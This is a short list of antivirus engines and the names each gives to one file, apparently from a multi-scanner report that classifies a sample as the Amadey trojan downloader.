Rising Downloader.Amadey!8.125AC (TFE:5:046sIl9HhmS)
Emsisoft Gen:Variant.Zusy.446510 (B)
VIPRE Gen:Variant.Zusy.446510
TrendMicro Trojan.Win32.AMADEY.YXDJ5Z
Sophos Mal/Amadey-C
SentinelOne Static AI - Malicious PE
GData Win32.Trojan-Downloader.Amadey.D
Google Detected
MAX malware (ai score=89)
Antiy-AVL Trojan[Downloader]/Win32.Amadey
Kingsoft malware.kb.a.951
Gridinsoft Trojan.Win32.Amadey.bot
Arcabit Trojan.Zusy.D6D02E
ZoneAlarm HEUR:Trojan-Downloader.Win32.Deyma.gen
Microsoft Trojan:Win32/Amadey.AM!MTB
Varist W32/Amadey.C1.gen!Eldorado
AhnLab-V3 Malware/Win.Trojanspy.C5238800
McAfee Downloader-FCND!B6D627DCF04D
DeepInstinct MALICIOUS
Cylance unsafe
Panda Trj/Chgt.AD
Tencent Malware.Win32.Gencirc.13f2b747
Ikarus Trojan.Win32.Amadey
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Amadey.A!tr
AVG Win32:DropperX-gen [Drp]